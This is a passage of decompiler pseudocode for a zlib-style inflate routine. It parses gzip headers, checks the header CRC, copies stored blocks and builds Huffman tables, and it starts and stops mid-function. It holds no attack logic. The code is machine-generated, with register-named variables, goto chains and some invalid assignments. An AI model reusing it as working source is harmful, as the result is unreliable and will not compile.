														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															__ecx =  *(__esp + 0x48);
															goto L29;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 2:
												L38:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L42:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 4) = __edx;
													}
													__eflags = __edi[4] & 0x00000200;
													if((__edi[4] & 0x00000200) != 0) {
														__eax = __edx;
														 *(__esp + 0x1c) = __dl;
														__eax = __edx >> 8;
														 *(__esp + 0x1d) = __al;
														__edx = __edx >> 0x10;
														 *(__esp + 0x1e) = __al;
														__eax = __esp + 0x1c;
														_push(4);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x27) = __dl;
														_push(__edi[6]);
														__eax = E00410970();
														__esp = __esp + 0xc;
														__edi[6] = __eax;
													}
													__edx = 0;
													 *__edi = 3;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													goto L49;
												} else {
													L39:
													while(1) {
														L40:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L41:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L42;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 3:
												L47:
												__eflags = __esi - 0x10;
												if(__esi >= 0x10) {
													L51:
													__ecx = __edi[8];
													__eflags = __ecx;
													if(__ecx != 0) {
														__eax = __dl & 0x000000ff;
														 *(__ecx + 8) = __dl & 0x000000ff;
														__ecx = __edx;
														__eax = __edi[8];
														__ecx = __edx >> 8;
														__eflags = __ecx;
														 *(0xc + __edi[8]) = __ecx;
													}
													__eflags = __edi[4] & 0x00000200;
													if((__edi[4] & 0x00000200) != 0) {
														 *(__esp + 0x1c) = __dl;
														__eax = __esp + 0x1c;
														_push(2);
														__eflags = __edx;
														_push(__eax);
														 *(__esp + 0x25) = __dl;
														_push(__edi[6]);
														__eax = E00410970();
														__esp = __esp + 0xc;
														__edi[6] = __eax;
													}
													__edx = 0;
													 *__edi = 4;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													goto L56;
												} else {
													L48:
													while(1) {
														L49:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L50:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x10;
														if(__esi < 0x10) {
															continue;
														} else {
															goto L51;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 4:
												L56:
												__eflags = __edi[4] & 0x00000400;
												if((__edi[4] & 0x00000400) == 0) {
													L65:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x10) = 0;
													}
													goto L67;
												} else {
													L57:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L60:
														__eax = __edi[8];
														__edi[0x10] = __edx;
														__eflags = __eax;
														if(__eax != 0) {
															 *(__eax + 0x14) = __edx;
														}
														__eflags = __edi[4] & 0x00000200;
														if((__edi[4] & 0x00000200) != 0) {
															 *(__esp + 0x1c) = __dl;
															__eax = __esp + 0x1c;
															_push(2);
															__eflags = __edx;
															_push(__eax);
															 *(__esp + 0x25) = __dl;
															_push(__edi[6]);
															__eax = E00410970();
															__esp = __esp + 0xc;
															__edi[6] = __eax;
														}
														__ecx = 0;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														L67:
														 *__edi = 5;
														goto L68;
													} else {
														while(1) {
															L58:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L59:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L60;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 5:
												L68:
												__eflags = __edi[4] & 0x00000400;
												if((__edi[4] & 0x00000400) == 0) {
													L82:
													__edi[0x10] = 0;
													 *__edi = 6;
													goto L83;
												} else {
													L69:
													__ecx = __edi[0x10];
													 *(__esp + 0x34) = __ecx;
													__eflags = __ecx - __ebp;
													if(__ecx > __ebp) {
														__ecx = __ebp;
														 *(__esp + 0x34) = __ebp;
													}
													__eflags = __ecx;
													if(__ecx != 0) {
														__edx = __edi[8];
														__eflags = __edx;
														if(__edx != 0) {
															__eax =  *(__edx + 0x10);
															 *(__esp + 0x30) = __eax;
															__eflags = __eax;
															if(__eax != 0) {
																__eax =  *(__edx + 0x14);
																__eax =  *(__edx + 0x14) - __edi[0x10];
																__edx =  *(0x18 + __edx);
																 *(__esp + 0x38) = __eax;
																__eflags = __eax - __edx;
																__eax =  *(__esp + 0x38);
																if(__eflags <= 0) {
																	__edx = __ecx;
																} else {
																	__edx = __edx - __eax;
																}
																__eax = __eax +  *(__esp + 0x30);
																__eflags = __eax;
																__eax = memcpy(__eax, __ebx, __edx);
																__ecx =  *(__esp + 0x40);
																__esp = __esp + 0xc;
															}
														}
														__eflags = __edi[4] & 0x00000200;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E00410970();
															__esp = __esp + 0xc;
															__edi[6] = __eax;
														}
														__eax =  *(__esp + 0x34);
														__ebx = __ebx + __eax;
														__ebp = __ebp - __eax;
														 *(__esp + 0x14) = __ebx;
														_t132 =  &(__edi[0x10]);
														 *_t132 = __edi[0x10] - __eax;
														__eflags =  *_t132;
													}
													__eflags = __edi[0x10];
													if(__edi[0x10] != 0) {
														goto L95;
													} else {
														goto L82;
													}
												}
												goto L360;
											case 6:
												L83:
												__eflags = __edi[4] & 0x00000800;
												if((__edi[4] & 0x00000800) == 0) {
													L106:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x1c) = 0;
													}
													goto L108;
												} else {
													L84:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L95;
													} else {
														L85:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L86:
															__eax =  *(__ebx + __ecx) & 0x000000ff;
															__ecx = 1 + __ecx;
															 *(__esp + 0x34) = __eax;
															__eax = __edi[8];
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x1c);
																__eflags =  *(__eax + 0x1c);
																if( *(__eax + 0x1c) != 0) {
																	__edx = __edi[0x10];
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x20));
																	if(__edx <  *((intOrPtr*)(__eax + 0x20))) {
																		__eax =  *(__eax + 0x1c);
																		__ebx =  *(__esp + 0x34);
																		 *(__eax + __edx) = __bl;
																		_t148 =  &(__edi[0x10]);
																		 *_t148 = 1 + __edi[0x10];
																		__eflags =  *_t148;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x34);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L91:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L92:
														__eflags = __edi[4] & 0x00000200;
														 *(__esp + 0x38) = __ecx;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E00410970();
															__ecx =  *(__esp + 0x44);
															__esp = __esp + 0xc;
															__edi[6] = __eax;
															__eax =  *(__esp + 0x34);
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax == 0) {
															L108:
															__edi[0x10] = 0;
															 *__edi = 7;
															goto L109;
														} else {
															goto L95;
														}
													}
												}
												goto L360;
											case 7:
												L109:
												__eflags = __edi[4] & 0x00001000;
												if((__edi[4] & 0x00001000) == 0) {
													L122:
													__eax = __edi[8];
													__eflags = __eax;
													if(__eax != 0) {
														 *(__eax + 0x24) = 0;
													}
													goto L124;
												} else {
													L110:
													__eflags = __ebp;
													if(__ebp == 0) {
														goto L95;
													} else {
														L111:
														__ecx = 0;
														__eflags = 0;
														while(1) {
															L112:
															__eax =  *(__ebx + __ecx) & 0x000000ff;
															__ecx = 1 + __ecx;
															 *(__esp + 0x34) = __eax;
															__eax = __edi[8];
															__eflags = __eax;
															if(__eax != 0) {
																__edx =  *(__eax + 0x24);
																__eflags =  *(__eax + 0x24);
																if( *(__eax + 0x24) != 0) {
																	__edx = __edi[0x10];
																	__eflags = __edx -  *((intOrPtr*)(__eax + 0x28));
																	if(__edx <  *((intOrPtr*)(__eax + 0x28))) {
																		__eax =  *(__eax + 0x24);
																		__ebx =  *(__esp + 0x34);
																		 *(__eax + __edx) = __bl;
																		_t193 =  &(__edi[0x10]);
																		 *_t193 = 1 + __edi[0x10];
																		__eflags =  *_t193;
																		__ebx =  *(__esp + 0x14);
																	}
																}
															}
															__eax =  *(__esp + 0x34);
															__eflags = __eax;
															if(__eax == 0) {
																break;
															}
															L117:
															__eflags = __ecx - __ebp;
															if(__ecx < __ebp) {
																continue;
															}
															break;
														}
														L118:
														__eflags = __edi[4] & 0x00000200;
														 *(__esp + 0x38) = __ecx;
														if((__edi[4] & 0x00000200) != 0) {
															_push(__ecx);
															_push(__ebx);
															_push(__edi[6]);
															__eax = E00410970();
															__ecx =  *(__esp + 0x44);
															__esp = __esp + 0xc;
															__edi[6] = __eax;
															__eax =  *(__esp + 0x34);
														}
														__ebx = __ebx + __ecx;
														__ebp = __ebp - __ecx;
														 *(__esp + 0x14) = __ebx;
														__eflags = __eax;
														if(__eax != 0) {
															goto L95;
														} else {
															L121:
															L124:
															__edx =  *(__esp + 0x10);
															 *__edi = 8;
															goto L125;
														}
													}
												}
												goto L360;
											case 8:
												L125:
												__eflags = __edi[4] & 0x00000200;
												if((__edi[4] & 0x00000200) == 0) {
													L133:
													__ecx = __edi[8];
													__eflags = __ecx;
													if(__ecx != 0) {
														__edi[4] = __edi[4] >> 9;
														__eax = __edi[4] >> 0x00000009 & 0x00000001;
														__eflags = __eax;
														 *(__ecx + 0x2c) = __eax;
														__eax = __edi[8];
														 *(__edi[8] + 0x30) = 1;
													}
													_push(0);
													_push(0);
													_push(0);
													__eax = E00410970();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													__edi[6] = __eax;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xb;
													goto L175;
												} else {
													L126:
													__eflags = __esi - 0x10;
													if(__esi >= 0x10) {
														L130:
														__eax = __edi[6] & 0x0000ffff;
														__eflags = __edx - __eax;
														if(__edx == __eax) {
															L132:
															__ecx = 0;
															__esi = 0;
															__eflags = 0;
															 *(__esp + 0x10) = 0;
															goto L133;
														} else {
															L131:
															__ecx =  *(__esp + 0x48);
															 *(0x18 + __ecx) = "header crc mismatch";
															 *__edi = 0x1d;
														}
														goto L175;
													} else {
														L127:
														while(1) {
															L128:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L129:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 0x10;
															if(__esi < 0x10) {
																continue;
															} else {
																goto L130;
															}
															goto L360;
														}
														goto L95;
													}
												}
												goto L360;
											case 9:
												L136:
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L139:
													__ecx = __edx;
													__edx = __edx << 0x10;
													__edx & 0x0000ff00 = (__edx & 0x0000ff00) + (__edx << 0x10);
													__edx = __edx >> 8;
													__ecx = (__edx & 0x0000ff00) + (__edx << 0x10) << 8;
													__eax = __edx >> 0x00000008 & 0x0000ff00;
													__eax = (__edx >> 0x00000008 & 0x0000ff00) + ((__edx & 0x0000ff00) + (__edx << 0x10) << 8);
													__edx = __edx >> 0x18;
													__ecx =  *(__esp + 0x48);
													__eax = __eax + __edx;
													__edx = 0;
													__edi[6] = __eax;
													 *(__esp + 0x10) = 0;
													__esi = 0;
													__eflags = 0;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xa;
													goto L140;
												} else {
													while(1) {
														L137:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L138:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L139;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0xa:
												L140:
												__eflags = __edi[3];
												if(__edi[3] == 0) {
													L335:
													__eax =  *(__esp + 0x24);
													 *(0xc + __ecx) =  *(__esp + 0x24);
													__eax =  *(__esp + 0x18);
													 *(__ecx + 0x10) =  *(__esp + 0x18);
													__eax = 2;
													 *__ecx = __ebx;
													 *(__ecx + 4) = __ebp;
													__edi[0xf] = __esi;
													_pop(__esi);
													_pop(__ebp);
													_pop(__ebx);
													__edi[0xe] = __edx;
													_pop(__edi);
													__esp = __esp + 0x34;
													return 2;
												} else {
													L141:
													_push(0);
													_push(0);
													_push(0);
													__eax = E00411170();
													__ecx =  *(__esp + 0x54);
													__esp = __esp + 0xc;
													__edx =  *(__esp + 0x10);
													__edi[6] = __eax;
													 *(__ecx + 0x30) = __eax;
													 *__edi = 0xb;
													goto L142;
												}
												goto L360;
											case 0xb:
												L142:
												__eax =  *(__esp + 0x4c);
												__eflags = __eax - 5;
												if(__eax == 5) {
													L342:
													__edi =  *(__esp + 0x10);
													__edx = __eax;
													goto L97;
												} else {
													L143:
													__eflags = __eax - 6;
													if(__eax == 6) {
														goto L342;
													} else {
														goto L144;
													}
												}
												goto L360;
											case 0xc:
												L144:
												__eflags = __edi[1];
												if(__edi[1] == 0) {
													L146:
													__eflags = __esi - 3;
													if(__esi >= 3) {
														L149:
														__eax = __edx;
														__edx = __edx >> 1;
														__edi[1] = __eax;
														__eax = __edx;
														__eax = __edx & 0x00000003;
														__eflags = __eax - 3;
														if(__eax > 3) {
															L152:
															__ecx =  *(__esp + 0x48);
															__edx = __edx >> 2;
															__esi = __esi - 3;
															 *(__esp + 0x10) = __edx;
															goto L175;
														} else {
															L150:
															switch( *((intOrPtr*)(__eax * 4 +  &M0041055C))) {
																case 0:
																	L151:
																	 *__edi = 0xd;
																	goto L152;
																case 1:
																	L153:
																	__eflags =  *(__esp + 0x4c) - 6;
																	__edi[0x13] = 0x413740;
																	__edi[0x15] = 9;
																	__edi[0x14] = 0x413f40;
																	__edi[0x16] = 5;
																	 *__edi = 0x13;
																	if( *(__esp + 0x4c) != 6) {
																		goto L152;
																	} else {
																		L154:
																		__edx = __edx >> 2;
																		__esi = __esi - 3;
																		 *(__esp + 0x10) = __edx;
																		goto L95;
																	}
																	goto L360;
																case 2:
																	L155:
																	_t254 = __esp + 0x48; // 0x9
																	__ecx =  *_t254;
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *__edi = 0x10;
																	 *(__esp + 0x10) = __edx;
																	goto L175;
																case 3:
																	L156:
																	_t256 = __esp + 0x48; // 0x9
																	__ecx =  *_t256;
																	__edx = __edx >> 2;
																	__esi = __esi - 3;
																	 *(__esp + 0x10) = __edx;
																	 *(0x18 + __ecx) = "invalid block type";
																	 *__edi = 0x1d;
																	goto L175;
															}
														}
													} else {
														while(1) {
															L147:
															__eflags = __ebp;
															if(__ebp == 0) {
																goto L95;
															}
															L148:
															__eax =  *__ebx & 0x000000ff;
															__ecx = __esi;
															__eax = ( *__ebx & 0x000000ff) << __cl;
															__ebx = __ebx + 1;
															__edx = __edx + __eax;
															 *(__esp + 0x14) = __ebx;
															__esi = __esi + 8;
															 *(__esp + 0x10) = __edx;
															__ebp = __ebp - 1;
															__eflags = __esi - 3;
															if(__esi < 3) {
																continue;
															} else {
																goto L149;
															}
															goto L360;
														}
														goto L95;
													}
												} else {
													L145:
													__ecx = __esi;
													 *__edi = 0x1a;
													__ecx = __esi & 0x00000007;
													__edx = __edx >> __cl;
													__esi = __esi - __ecx;
													 *(__esp + 0x10) = __edx;
													goto L174;
												}
												goto L360;
											case 0xd:
												L157:
												__esi = __esi & 0x00000007;
												__edx = __edx >> __cl;
												__esi = __esi - (__esi & 0x00000007);
												 *(__esp + 0x10) = __edx;
												__eflags = __esi - 0x20;
												if(__esi >= 0x20) {
													L161:
													__eax = __edx;
													__ecx = __edx;
													__eax =  !__edx;
													__ecx = __edx & 0x0000ffff;
													__eax =  !__edx >> 0x10;
													__eflags = __ecx - __eax;
													if(__ecx == __eax) {
														L163:
														__edx = 0;
														__edi[0x10] = __ecx;
														__esi = 0;
														 *(__esp + 0x10) = 0;
														__eflags =  *(__esp + 0x4c) - 6;
														 *__edi = 0xe;
														if( *(__esp + 0x4c) == 6) {
															L341:
															__edi = 0;
															goto L96;
														} else {
															L164:
															__ecx =  *(__esp + 0x48);
															goto L165;
														}
													} else {
														L162:
														__ecx =  *(__esp + 0x48);
														 *(0x18 + __ecx) = "invalid stored block lengths";
														 *__edi = 0x1d;
														goto L175;
													}
												} else {
													L158:
													while(1) {
														L159:
														__eflags = __ebp;
														if(__ebp == 0) {
															goto L95;
														}
														L160:
														__eax =  *__ebx & 0x000000ff;
														__ecx = __esi;
														__eax = ( *__ebx & 0x000000ff) << __cl;
														__ebx = __ebx + 1;
														__edx = __edx + __eax;
														 *(__esp + 0x14) = __ebx;
														__esi = __esi + 8;
														 *(__esp + 0x10) = __edx;
														__ebp = __ebp - 1;
														__eflags = __esi - 0x20;
														if(__esi < 0x20) {
															continue;
														} else {
															goto L161;
														}
														goto L360;
													}
													goto L95;
												}
												goto L360;
											case 0xe:
												L165:
												 *__edi = 0xf;
												goto L166;
											case 0xf:
												L166:
												__eax = __edi[0x10];
												 *(__esp + 0x34) = __eax;
												__eflags = __eax;
												if(__eax == 0) {
													L177:
													 *__edi = 0xb;
													goto L175;
												} else {
													L167:
													__eflags = __eax - __ebp;
													if(__eax > __ebp) {
														__eax = __ebp;
														 *(__esp + 0x34) = __ebp;
													}
													__ecx =  *(__esp + 0x18);
													__eflags = __eax - __ecx;
													if(__eax > __ecx) {
														__eax = __ecx;
														 *(__esp + 0x34) = __eax;
													}
													__eflags = __eax;
													if(__eax == 0) {
														goto L95;
													} else {
														L172:
														__eax = memcpy( *(__esp + 0x2c), __ebx, __eax);
														__eax =  *(__esp + 0x40);
														__esp = __esp + 0xc;
														 *(__esp + 0x18) =  *(__esp + 0x18) - __eax;
														__ebx = __ebx + __eax;
														 *(__esp + 0x24) =  *(__esp + 0x24) + __eax;
														__ebp = __ebp - __eax;
														_t279 =  &(__edi[0x10]);
														 *_t279 = __edi[0x10] - __eax;
														__eflags =  *_t279;
														 *(__esp + 0x14) = __ebx;
														goto L173;
													}
												}
												goto L360;
											case 0x10:
												goto L0;
											case 0x11:
												goto L185;
											case 0x12:
												L197:
												_t908 = _t1063[0x1a];
												 *(_t1104 + 0x34) = _t908;
												__eflags = _t908 - _t1063[0x19] + _t1063[0x18];
												if(_t908 >= _t1063[0x19] + _t1063[0x18]) {
													L233:
													__eflags =  *_t1063 - 0x1d;
													if( *_t1063 == 0x1d) {
														L173:
														_t1014 =  *(_t1104 + 0x10);
														goto L174;
													} else {
														L234:
														__eflags = _t1063[0x9c];
														if(_t1063[0x9c] != 0) {
															L237:
															_t754 =  &(_t1063[0x14c]);
															_t1063[0x15] = 9;
															_t1063[0x13] = _t754;
															_t1063[0x1b] = _t754;
															_t757 = E00411490(1,  &(_t1063[0x1c]), _t1063[0x18],  &(_t1063[0x1b]),  &(_t1063[0x15]),  &(_t1063[0xbc]));
															_t1104 = _t1104 + 0x18;
															 *(_t1104 + 0x2c) = _t757;
															__eflags = _t757;
															if(_t757 == 0) {
																L239:
																_t1063[0x14] = _t1063[0x1b];
																_t1063[0x16] = 6;
																_t1029 = E00411490(2, _t1063 + (_t1063[0x18] + 0x38) * 2, _t1063[0x19],  &(_t1063[0x1b]),  &(_t1063[0x16]),  &(_t1063[0xbc]));
																_t1104 = _t1104 + 0x18;
																 *(_t1104 + 0x2c) = _t1029;
																__eflags = _t1029;
																if(_t1029 == 0) {
																	L241:
																	_t1019 =  *((intOrPtr*)(_t1104 + 0x4c));
																	 *_t1063 = 0x13;
																	__eflags = _t1019 - 6;
																	if(_t1019 == 6) {
																		L340:
																		_t1064 =  *(_t1104 + 0x10);
																		goto L97;
																	} else {
																		L242:
																		_t1030 =  *(_t1104 + 0x10);
																		_t911 =  *(_t1104 + 0x48);
																		goto L243;
																	}
																} else {
																	L240:
																	_t894 =  *(_t1104 + 0x48);
																	_t1014 =  *(_t1104 + 0x10);
																	_t894[6] = "invalid distances set";
																	 *_t1063 = 0x1d;
																	goto L175;
																}
															} else {
																L238:
																_t894 =  *(_t1104 + 0x48);
																_t1014 =  *(_t1104 + 0x10);
																_t894[6] = "invalid literal/lengths set";
																 *_t1063 = 0x1d;
																goto L175;
															}
														} else {
															L235:
															_t894 =  *(_t1104 + 0x48);
															_t1014 =  *(_t1104 + 0x10);
															_t894[6] = "invalid code -- missing end-of-block";
															 *_t1063 = 0x1d;
															goto L175;
														}
													}
												} else {
													L198:
													_t1064 =  *(_t1104 + 0x10);
													do {
														L199:
														_t832 =  *(( *(_t1104 + 0x20))[0x13] + ((0x00000001 <<  *( *(_t1104 + 0x40))) - 0x00000001 & _t1064) * 4);
														 *(_t1104 + 0x38) = _t832;
														__eflags = (_t832 >> 0x00000008 & 0x000000ff) - _t1091;
														if((_t832 >> 0x00000008 & 0x000000ff) <= _t1091) {
															L203:
															_t1050 = _t832 >> 0x10;
															__eflags = _t1050 - 0x10;
															if(__eflags >= 0) {
																L205:
																if(__eflags != 0) {
																	L212:
																	__eflags =  *(_t1104 + 0x3a) - 0x11;
																	_t1051 =  *(_t1104 + 0x10);
																	_t991 = _t832 & 0x000000ff;
																	if( *(_t1104 + 0x3a) != 0x11) {
																		L219:
																		_t1089 = _t991 + 7;
																		 *(_t1104 + 0x38) = _t991;
																		__eflags = _t1091 - _t1089;
																		if(_t1091 >= _t1089) {
																			L224:
																			_t1052 = _t1051 >> _t991;
																			_t1014 = _t1052 >> 7;
																			__eflags = _t1014;
																			 *(_t1104 + 0x30) = 0xb + (_t1052 & 0x0000007f);
																			_t836 = 0xfffffff9;
																			goto L225;
																		} else {
																			L220:
																			while(1) {
																				L221:
																				__eflags = _t1097;
																				if(_t1097 == 0) {
																					goto L95;
																				}
																				L222:
																				_t844 = ( *_t868 & 0x000000ff) << _t1091;
																				_t868 =  &(_t868[1]);
																				_t1051 = _t1051 + _t844;
																				 *(_t1104 + 0x14) = _t868;
																				_t1091 = _t1091 + 8;
																				 *(_t1104 + 0x10) = _t1051;
																				_t1097 = _t1097 - 1;
																				__eflags = _t1091 - _t1089;
																				if(_t1091 < _t1089) {
																					continue;
																				} else {
																					L223:
																					_t991 =  *(_t1104 + 0x38);
																					goto L224;
																				}
																				goto L360;
																			}
																			goto L95;
																		}
																	} else {
																		L213:
																		_t1090 = _t991 + 3;
																		 *(_t1104 + 0x38) = _t991;
																		__eflags = _t1091 - _t1090;
																		if(_t1091 >= _t1090) {
																			L218:
																			_t1055 = _t1051 >> _t991;
																			_t1014 = _t1055 >> 3;
																			 *(_t1104 + 0x30) = (_t1055 & 0x00000007) + 3;
																			_t836 = 0xfffffffd;
																			L225:
																			_t1063 =  *(_t1104 + 0x20);
																			_t1091 = _t1091 + _t836 - _t991;
																			__eflags = _t1091;
																			 *(_t1104 + 0x38) = 0;
																			_t838 =  *(_t1104 + 0x30);
																			goto L226;
																		} else {
																			L214:
																			while(1) {
																				L215:
																				__eflags = _t1097;
																				if(_t1097 == 0) {
																					goto L95;
																				}
																				L216:
																				_t849 = ( *_t868 & 0x000000ff) << _t1091;
																				_t868 =  &(_t868[1]);
																				_t1051 = _t1051 + _t849;
																				 *(_t1104 + 0x14) = _t868;
																				_t1091 = _t1091 + 8;
																				 *(_t1104 + 0x10) = _t1051;
																				_t1097 = _t1097 - 1;
																				__eflags = _t1091 - _t1090;
																				if(_t1091 < _t1090) {
																					continue;
																				} else {
																					L217:
																					_t991 =  *(_t1104 + 0x38);
																					goto L218;
																				}
																				goto L360;
																			}
																			goto L95;
																		}
																	}
																} else {
																	L206:
																	_t1001 = (_t832 >> 0x00000008 & 0x000000ff) + 2;
																	 *(_t1104 + 0x38) = _t1001;
																	__eflags = _t1091 - _t1001;
																	if(_t1091 >= _t1001) {
																		L210:
																		_t1063 =  *(_t1104 + 0x20);
																		_t1002 = _t832 & 0x000000ff;
																		_t850 =  *(_t1104 + 0x34);
																		_t1091 = _t1091 - _t1002;
																		_t1014 =  *(_t1104 + 0x10) >> _t1002;
																		 *(_t1104 + 0x10) = _t1014;
																		__eflags = _t850;
																		if(_t850 == 0) {
																			L236:
																			_t894 =  *(_t1104 + 0x48);
																			_t894[6] = "invalid bit length repeat";
																			 *_t1063 = 0x1d;
																			goto L175;
																		} else {
																			L211:
																			 *(_t1104 + 0x38) =  *(_t1063 + 0x6e + _t850 * 2) & 0x0000ffff;
																			_t853 = _t1014 & 0x00000003;
																			_t1014 = _t1014 >> 2;
																			_t838 = _t853 + 3;
																			_t1091 = _t1091 - 2;
																			 *(_t1104 + 0x30) = _t838;
																			L226:
																			_t868 =  *(_t1104 + 0x14);
																			 *(_t1104 + 0x10) = _t1014;
																			__eflags = _t838 +  *(_t1104 + 0x34) - _t1063[0x19] + _t1063[0x18];
																			if(_t838 +  *(_t1104 + 0x34) > _t1063[0x19] + _t1063[0x18]) {
																				goto L236;
																			} else {
																				L227:
																				_t994 =  *(_t1104 + 0x30);
																				__eflags = _t994;
																				if(_t994 != 0) {
																					L228:
																					_t1054 =  *(_t1104 + 0x38);
																					do {
																						L229:
																						 *(_t1063 + 0x70 + _t1063[0x1a] * 2) = _t1054;
																						_t1063[0x1a] = 1 + _t1063[0x1a];
																						_t994 = _t994 - 1;
																						__eflags = _t994;
																					} while (_t994 != 0);
																				}
																				L230:
																				_t995 =  *(_t1104 + 0x20);
																				_t1064 =  *(_t1104 + 0x10);
																				goto L231;
																			}
																		}
																	} else {
																		L207:
																		while(1) {
																			L208:
																			__eflags = _t1097;
																			if(_t1097 == 0) {
																				goto L96;
																			}
																			L209:
																			_t1058 = ( *_t868 & 0x000000ff) << _t1091;
																			_t868 =  &(_t868[1]);
																			_t1064 = _t1064 + _t1058;
																			 *(_t1104 + 0x14) = _t868;
																			_t1091 = _t1091 + 8;
																			 *(_t1104 + 0x10) = _t1064;
																			_t1097 = _t1097 - 1;
																			__eflags = _t1091 -  *(_t1104 + 0x38);
																			if(_t1091 <  *(_t1104 + 0x38)) {
																				continue;
																			} else {
																				goto L210;
																			}
																			goto L360;
																		}
																		goto L96;
																	}
																}
															} else {
																L204:
																_t1004 = _t832 >> 0x00000008 & 0x000000ff;
																_t1091 = _t1091 - _t1004;
																_t1064 = _t1064 >> _t1004;
																_t995 =  *(_t1104 + 0x20);
																 *(_t1104 + 0x10) = _t1064;
																 *(_t995 + 0x70 +  *(_t1104 + 0x34) * 2) = _t1050;
																_t995[0x1a] = 1 + _t995[0x1a];
																goto L231;
															}
														} else {
															L200:
															while(1) {
																L201:
																__eflags = _t1097;
																if(_t1097 == 0) {
																	goto L96;
																}
																L202:
																_t1064 = _t1064 + (( *_t868 & 0x000000ff) << _t1091);
																_t868 =  &(_t868[1]);
																_t1091 = _t1091 + 8;
																_t1097 = _t1097 - 1;
																 *(_t1104 + 0x10) = _t1064;
																 *(_t1104 + 0x14) = _t868;
																_t832 =  *(( *(_t1104 + 0x20))[0x13] + ((0x00000001 <<  *( *(_t1104 + 0x40))) - 0x00000001 & _t1064) * 4);
																 *(_t1104 + 0x38) = _t832;
																__eflags = (_t832 >> 0x00000008 & 0x000000ff) - _t1091;
																if((_t832 >> 0x00000008 & 0x000000ff) > _t1091) {
																	continue;
																} else {
																	goto L203;
																}
																goto L360;
															}
															goto L96;
														}
														goto L360;
														L231:
														_t1053 = _t995[0x1a];
														 *(_t1104 + 0x34) = _t1053;
														__eflags = _t1053 - _t995[0x19] + _t995[0x18];
													} while (_t1053 < _t995[0x19] + _t995[0x18]);
													_t1063 =  *(_t1104 + 0x20);
													goto L233;
												}
												goto L360;
											case 0x13:
												L243:
												 *_t1063 = 0x14;
												goto L244;
											case 0x14:
												L244:
												__eflags = _t1097 - 6;
												if(_t1097 < 6) {
													L248:
													 *(_t1104 + 0x34) = _t1063[0x13];
													_t1063[0x6f1] = 0;
													_t769 =  *(_t1063[0x13] + ((0x00000001 << _t1063[0x15]) - 0x00000001 & _t1030) * 4);
													__eflags = 0xad - _t1091;
													if(0xad <= _t1091) {
														L251:
														__eflags = _t769;
														if(_t769 == 0) {
															L258:
